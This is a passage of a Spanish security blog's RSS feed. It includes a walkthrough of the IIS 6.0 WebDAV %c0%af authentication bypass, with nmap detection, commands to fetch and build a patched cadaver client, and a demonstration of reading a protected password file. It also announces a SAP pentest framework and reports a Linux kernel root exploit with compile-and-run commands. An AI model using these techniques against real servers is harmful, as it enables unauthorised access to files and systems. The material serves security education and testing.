/> &lt;executable xmlns=&#8221;http://apache.org/dav/props/&#8221;/&gt;<br
/> &lt;resourcetype xmlns=&#8221;DAV:&#8221;/&gt;<br
/> &lt;checked-in xmlns=&#8221;DAV:&#8221;/&gt;<br
/> &lt;checked-out xmlns=&#8221;DAV:&#8221;/&gt;<br
/> &lt;/prop&gt;<br
/> &lt;/propfind&gt;</p><p>Cuando <strong>WebDAV está activado</strong>, debería devolver <em><strong>&#8220;HTTP/1.1 207 Multi-Status&#8221;</strong></em>.<br
/> Cuando <strong>WebDAV ha sido desactivado</strong>, debería retornar <em><strong>&#8220;HTTP/1.1 501 Not Supported&#8221;</strong></em>.</p><p>Éste es el método que he implementado en el script http-iis-webdav-vuln.nse. Funciona muy bien en el laboratorio con los servidores IIS. Si recibimos alguna otra cosa diferente a 207 o 501 entonces abordamos el barco diciendo que el servidor no está soportado. Por otrolado, un servidor Aparche corriendo sobre Ubuntu devolvería un 405 Method Not Allowed.</p><h2>Verificando si un servidor es vulnerable</h2><p><strong>Las pruebas han sido realizadas en:</strong></p><ul><li>IIS 6.0/Windows 2003 Enterprise SP2</li><li>IIS 5.1/Windows XP Pro SP2</li></ul><p><strong>No funciona en:</strong></p><ul><li>IIS 5.0/Windows 2000 SP4</li></ul><p>El script original sólo usaba un forma para verificar; primero encontraría un directorio protegido (<em>/secret/</em>) y luego probaría intentando el caracter <em>%c0%af</em> después del primer /. Entonces <em>/secret/</em> se convertiría en <em>/%c0%afsecret/</em>.</p><p>Funcionó muy bien en IIS 6.0 pero no funcionó del todo en IIS 5.0/5.1. Después jugar un poco más hoy con esto, logramos hacerlo funcionar en IIS 5.1. El problema con el 5.1 es que el caracter <em>%c0%af</em> no puede estar justo antes de / pero sí en alguna parte entre el nombre del directorio. También funcionó en IIS 6.0. Modifiqué el script de manera que usara la verificación de IIS 5.0/6.0, convirtiendo <em><strong>/secret/</strong></em> en <strong><em>/s%c0%afecret/</em></strong>.</p><h2>Encontrando un servidor vulnerable</h2><p><strong>Las pruebas han sido realizadas en:</strong></p><ul><li>IIS 6.0/Windows 2003 Enterprise SP2</li><li>IIS 5.1/Windows XP Pro SP2</li></ul><p><strong>No funciona en:</strong></p><ul><li>IIS 5.0/Windows 2000 SP4</li></ul><p>Ahora vamos a la parte divertida. Si hasta ahora no te has divertido, vete preparando por que ya casi llegamos!</p><p>Lo primero que necesitamos hacer es encontrar un servidor vulnerable. Sólo llegué a saber de un Windows 2003 en mi laboratorio corriendo IIS 6.0 que es vulnerable (actualizado y parcheado hasta la fecha). Veamos funciona como un escaneo con nmap en este sistema con el script actualizado:</p><p
style="padding-left: 30px;">&gt; ./nmap -T4 -p80 &#8211;script=http-iis-webdav-vuln xxx.xxx.xxx.xxx</p><p
style="padding-left: 30px;">Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT<br
/> Interesting ports on xxx.xxx.xxx.xxx:<br
/> PORT   STATE SERVICE<br
/> 80/tcp open  http<br
/> |_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav</p><p
style="padding-left: 30px;">Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds</p><p>Interesante! Ahora sabemos que el servidor tiene WebDAV activado y hay 3 directorios vulnerables.</p><h2>Explotándolo!</h2><p>Ahora podríamos hacer lo que sea haciendo uso de telnet por el puerto 80, pero no es muy divertido (creeme, es muy tedioso!) así que busqué un cliente WebDAV. Me tropecé con un software libre llamado <a
title="cadaver WebDAV" href="http://www.webdav.org/cadaver/">cadaver</a>, y basado únicamente en el nombre lo descargué. Cadaver por sí mismo es un gran cliente WebDAV de línea de comandos pero rápidamente me dí cuenta que tiene un montón de problemas que no nos dejarían hacer lo que queríamos. Lo bueno del software libre es que es abierto, así que descargué el <a
title="cadaver-0.23.2.tar.gz" href="http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz">código fuente de cadaver-0.23.2</a> y después de modificarlo un poco, resultamos con un <a
title="cadaver-0.23.2-h4x.patch" href="http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch">pequeño parche</a> que hace bastante sencillo explotar un servidor. Revisa el parche por ti mismo para ver detalles a fondo pero básicamente hace lo siguiente:</p><p>1. Reemplazar cualquier cabecera &#8220;Depth: 0&#8243; por &#8220;Depth: 1&#8243; (de otro modo LS no funcionaría)<br
/> 2. Agregar la cabecera &#8220;Translate: f&#8221; a cada petición (de otra manera GET y probablemente otros no funcionarían.<br
/> 3. Insertar los caracteres &#8220;%c0%af&#8221; en cualquier petición con más de 1 caracter.</p><p>Así que baja el parche <a
href="http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch"><strong>cadaver-0.23.2-h4x.patch</strong></a> y apĺícalo a la <strong>fuentes de cadaver-0.23.2</strong> desde el <a
title="cadaver WebDAV" href="http://www.webdav.org/cadaver/">sitio web de cadaver</a>. Aquí están los comandos:<code><br
/> </code></p><p
style="padding-left: 30px;">&gt; mkdir cadaver-h4x<br
/> &gt; cd cadaver-h4x<br
/> &gt; wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch<br
/> &#8211;recortado&#8211;<br
/> &gt; wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz<br
/> &#8211;recortado&#8211;<br
/> &gt; tar xzvf cadaver-0.23.2.tar.gz<br
/> &#8211;recortado&#8211;<br
/> &gt; cd cadaver-0.23.2/<br
/> &gt; patch -p1 &lt; ../cadaver-0.23.2-h4x.patch<br
/> patching file lib/neon/ne_basic.c<br
/> patching file lib/neon/ne_request.c<br
/> patching file lib/neon/ne_uri.c<br
/> &gt; ./configure<br
/> &#8211;recortado&#8211;<br
/> &gt; make<br
/> &#8211;recortado&#8211;</p><p>Ahora deberíamos de tener una versión parcheada y compilada de cadaver. Iníciala con el servidor que habías identificado con directorios vulnerables anteriormente:</p><p
style="padding-left: 30px;">&gt; ./cadaver xxx.xxx.xxx.xxx</p><p>Esto debería de dejarte en un prompt con &#8220;dav:/&gt;&#8221;. Ahora simplemente haz cd al directorio vulnerable y verifica que hay ahí:<code><br
/> </code></p><p
style="padding-left: 30px;">dav:/&gt; cd secret<br
/> dav:/secret/&gt; ls<br
/> Listing collection `/secret/&#8217;: succeeded.<br
/> password.txt                           7  May 19 10:40<br
/> dav:/secret/&gt; cat password.txt<br
/> Displaying `/secret/password.txt&#8217;:<br
/> ron$pr0ns<br
/> dav:/secret/&gt;</p><p>Y ahí lo tienes!</p><p>Aquí tienes una lista de comandos que he probado y funcionan con cadaver parcheado en un directorio vulnerable:</p><ul><li>CD</li><li>LS</li><li>MOVE</li><li>PUT</li><li>GET</li><li>CAT</li><li>DELETE</li></ul><p>Curiosamente, el comando COPY no funciona. No hemos tenido tiempo para investigar por, pero la funcionalidad puede ser duplicada con un <strong>get/local rename/put</strong>.</p><p>Este cadaver parcheado tampoco funcionará para examinar directorios WebDAV regulares (no vulnerables), así que no intentes.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a
href="http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml" title="Parches para Windows que corrigen Vulnerabilidades Criticas">Parches para Windows que corrigen Vulnerabilidades Criticas</a></li><li><a
href="http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml" title="Denegacion de Servicio desde el WordPad">Denegacion de Servicio desde el WordPad</a></li><li><a
href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a
href="http://www.dragonjar.org/video-tutorial-de-nessus-y-baseline-security-analyzer.xhtml" title="Video Tutorial de Nessus y Baseline Security Analyzer">Video Tutorial de Nessus y Baseline Security Analyzer</a></li><li><a
href="http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml" title="Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;">Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</a></li><li><a
href="http://www.dragonjar.org/winautopwn-ataques-automaticos-de-entornos-windows.xhtml" title="winAUTOPWN &#8211; Ataques automáticos de entornos Windows">winAUTOPWN &#8211; Ataques automáticos de entornos Windows</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml/feed</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Nueva version de SAPYTO (0.98)</title><link>http://www.dragonjar.org/nueva-version-de-sapyto-098.xhtml</link> <comments>http://www.dragonjar.org/nueva-version-de-sapyto-098.xhtml#comments</comments> <pubDate>Sun, 28 Dec 2008 00:08:06 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Exploits]]></category> <category><![CDATA[Framework]]></category> <category><![CDATA[fuerza bruta]]></category> <category><![CDATA[penetration tests]]></category> <category><![CDATA[SAP]]></category> <category><![CDATA[sap r 3]]></category> <category><![CDATA[SAProuter]]></category> <category><![CDATA[SAPYTO]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Shell]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1651</guid> <description><![CDATA[Acaba de salir una nueva versión de SAPYTO un Framework para realizar Penetration Tests sobre sistemas SAP que permite a profesionales de seguridad llevar a cabo análisis de diferentes componentes de implementaciones de SAP R/3. Esta versión es principalmente un completo rediseño de sapyto tanto su núcleo como su arquitectura ha sido modificado para facilitar [...]]]></description> <content:encoded><![CDATA[<p>Acaba de salir una nueva versión de <a
title="Enlace permanente a SAPYTO - Framework para realizar Penetration Tests sobre sistemas SAP" rel="bookmark" href="../sapyto-framework-para-realizar-penetration-tests-sobre-sistemas-sap.xhtml">SAPYTO</a> un <a
href="http://www.dragonjar.org/tag/framework" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Framework">Framework</a> para realizar <a
href="http://www.dragonjar.org/tag/penetration-tests" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con penetration tests">Penetration Tests</a> sobre sistemas <a
href="http://www.dragonjar.org/tag/sap" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SAP">SAP</a> que permite a profesionales de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> llevar a cabo análisis de diferentes componentes de implementaciones de <a
href="http://www.dragonjar.org/tag/sap" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SAP">SAP</a> R/3.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img387.imageshack.us/img387/8673/logosapytotq1.jpg" alt="logosapytotq1 Nueva version de SAPYTO (0.98)"  title="Nueva version de SAPYTO (0.98)" /></p><p>Esta versión es principalmente un completo rediseño de <a
href="http://www.dragonjar.org/tag/sapyto" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SAPYTO">sapyto</a> tanto su núcleo como su arquitectura ha sido modificado para facilitar el soporte a futuras versiones. Algunas de las nuevas características son:<span
id="more-1651"></span></p><ul><li>Objetivo de configuración se basa ahora en &#8220;conectores&#8221;, que representan diferentes maneras de comunicarse con los servicios y componentes de SAP.</li><li>Los plugins son ahora dividido en tres categorías: Descubrir, Auditar y Explotar.</li><li>Los plugins <a
href="http://www.dragonjar.org/tag/exploits" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploits">exploits</a> ahora generan <a
href="http://www.dragonjar.org/tag/shell" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Shell">shell</a>´s y/o sapyto Agent objects.</li><li>Nuevos plugins!: <a
href="http://www.dragonjar.org/tag/fuerza-bruta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con fuerza bruta">Fuerza Bruta</a> a cuenta de usuario, enumeración de clientes, evaluación de <a
href="http://www.dragonjar.org/tag/saprouter" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SAProuter">SAProuter</a> y más &#8230;</li><li>Desarrollador Plugin´s ahora es mas fácil, la interface se ha simplificado y mejorado drásticamente.</li><li>Proceso de instalación y documentación general mejorado.</li></ul><p><strong>Para Más Información:</strong><br
/> <a
href="http://www.cybsec.com/ES/investigacion/sapyto.php">Página Oficial del SAPYTO</a><br
/> <a
href="http://www.dragonjar.org/sapyto-framework-para-realizar-penetration-tests-sobre-sistemas-sap.xhtml">SAPYTO &#8211; Framework para realizar Penetration Tests sobre sistemas SAP </a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/winautopwn-ataques-automaticos-de-entornos-windows.xhtml" title="winAUTOPWN &#8211; Ataques automáticos de entornos Windows">winAUTOPWN &#8211; Ataques automáticos de entornos Windows</a></li><li><a
href="http://www.dragonjar.org/como-realizar-un-pentest.xhtml" title="¿Cómo se realiza un Pentest?">¿Cómo se realiza un Pentest?</a></li><li><a
href="http://www.dragonjar.org/memorias-del-vi-owasp-spain-chapter-meeting.xhtml" title="Memorias del VI OWASP Spain Chapter Meeting">Memorias del VI OWASP Spain Chapter Meeting</a></li><li><a
href="http://www.dragonjar.org/revistas-hakin9-gratis.xhtml" title="Hakin9 Español GRATIS">Hakin9 Español GRATIS</a></li><li><a
href="http://www.dragonjar.org/manual-en-espanol-de-meterpreter.xhtml" title="Manual en español de Meterpreter">Manual en español de Meterpreter</a></li><li><a
href="http://www.dragonjar.org/manual-de-metasploit-framework-en-espanol.xhtml" title="Manual de Metasploit Framework en Español">Manual de Metasploit Framework en Español</a></li><li><a
href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a
href="http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml" title="Vídeo: Introducción al Metasploit Framework">Vídeo: Introducción al Metasploit Framework</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/nueva-version-de-sapyto-098.xhtml/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Detectan grave vulnerabilidad en el Kernel Linux 2.6.17 – 2.6.24.1</title><link>http://www.dragonjar.org/vulnerabilidad-grave-en-el-kernel-linux-2617-26241.xhtml</link> <comments>http://www.dragonjar.org/vulnerabilidad-grave-en-el-kernel-linux-2617-26241.xhtml#comments</comments> <pubDate>Mon, 11 Feb 2008 21:08:04 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Exploits]]></category> <category><![CDATA[Kernel]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[Vulnerabilidad]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=406</guid> <description><![CDATA[Una nueva vulnerabilidad que afecta las versiones del kernel de linux 2.6.17 hasta el 2.6.2.4.1 ha salido a la luz, este fallo permite obtener permisos de root por lo que la vulnerabilidad es GRAVE y es recomendable que apliques el parche que soluciona este fallo tan pronto puedas hacerlo. Muchas distribuciones se han visto afectadas, [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: center;"><img
src="http://farm3.static.flickr.com/2388/2258386771_a6b8fb01c4_o.jpg" alt="2258386771 a6b8fb01c4 o Detectan grave vulnerabilidad en el Kernel Linux 2.6.17 – 2.6.24.1" width="313" height="396" title="Detectan grave vulnerabilidad en el Kernel Linux 2.6.17 – 2.6.24.1" /></p><p><strong>Una nueva <a
href="http://www.dragonjar.org/tag/vulnerabilidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidad">vulnerabilidad</a></strong> que afecta las versiones del <span
style="text-decoration: underline;"><a
href="http://www.dragonjar.org/tag/kernel" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Kernel">kernel</a> de <a
href="http://www.dragonjar.org/tag/linux" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Linux">linux</a> 2.6.17 hasta el 2.6.2.4.1</span> ha salido a la luz, este fallo permite obtener permisos de root por lo que <strong>la vulnerabilidad es GRAVE</strong> y es recomendable que <a
href="http://lkml.org/lkml/2008/2/11/25">apliques el parche que soluciona este fallo</a> tan pronto puedas hacerlo.<span
id="more-406"></span></p><p>Muchas distribuciones se han visto afectadas, desde Ubuntu Gutsy hasta <a
href="http://www.net-security.org/secworld.php?id=5809">openSuSE 10.2/10.3</a>, es recomendable que <a
href="http://www.milw0rm.com/exploits/5092">pruebes el exploit</a> en tu distro para que verifiques si eres <strong>vulnerable</strong> (si no lo eres prueba con el <a
href="http://www.milw0rm.com/exploits/5093">segundo exploit que han publicado</a> antes de cantar victoria), de ser así puedes usar el sistema de actualizaciones de tu distribución o <a
href="http://lkml.org/lkml/2008/2/11/25">parchearlo manualmente</a>.</p><p><em>Para compilar el <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a> basta con descargarlo y compilarlo con gcc (gcc <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a>.c -o <a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a>) y luego ejecutarlo ./<a
href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a> (tal como se muestra en la imagen de arriba)</em>.</p><p>Otras personas que hablan del fallo, <a
href="http://cronopio2.blogspot.com/2008/02/vulnerabilidad-critica-en-kernel-linux.html">Cronopio</a>, <a
href="http://www.kriptopolis.org/bug-kernel-linux">Kriptopolis</a> y <a
href="http://magarto.com/blog/archivo/2008/02/11/urgente-exploit-en-gnulinux-para-cambiarse-a-root/">Magarto</a>.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/backtrack-5.xhtml" title="BackTrack 5">BackTrack 5</a></li><li><a
href="http://www.dragonjar.org/descargar-backtrack-4-r1.xhtml" title="Descargar BackTrack 4 R1">Descargar BackTrack 4 R1</a></li><li><a
href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a
href="http://www.dragonjar.org/segurisemanal-iii.xhtml" title="SeguriSemanal III">SeguriSemanal III</a></li><li><a
href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml" title="Detección de WebDAV, verificación de la vulnerabilidad y explotación">Detección de WebDAV, verificación de la vulnerabilidad y explotación</a></li><li><a
href="http://www.dragonjar.org/nuevo-gusano-infecta-routers-modems-y-sistemas-gnu-linux.xhtml" title="Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux">Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux</a></li><li><a
href="http://www.dragonjar.org/hacking-de-redes-upnp-parte-iii.xhtml" title="Hacking de Redes UPnP &#8211; Parte III">Hacking de Redes UPnP &#8211; Parte III</a></li><li><a
href="http://www.dragonjar.org/hacking-de-redes-upnp-parte-ii.xhtml" title="Hacking de Redes UPnP &#8211; Parte II">Hacking de Redes UPnP &#8211; Parte II</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/vulnerabilidad-grave-en-el-kernel-linux-2617-26241.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 26/108 queries in 0.145 seconds using disk: basic
Object Caching 4306/4425 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 20:11:57 -->
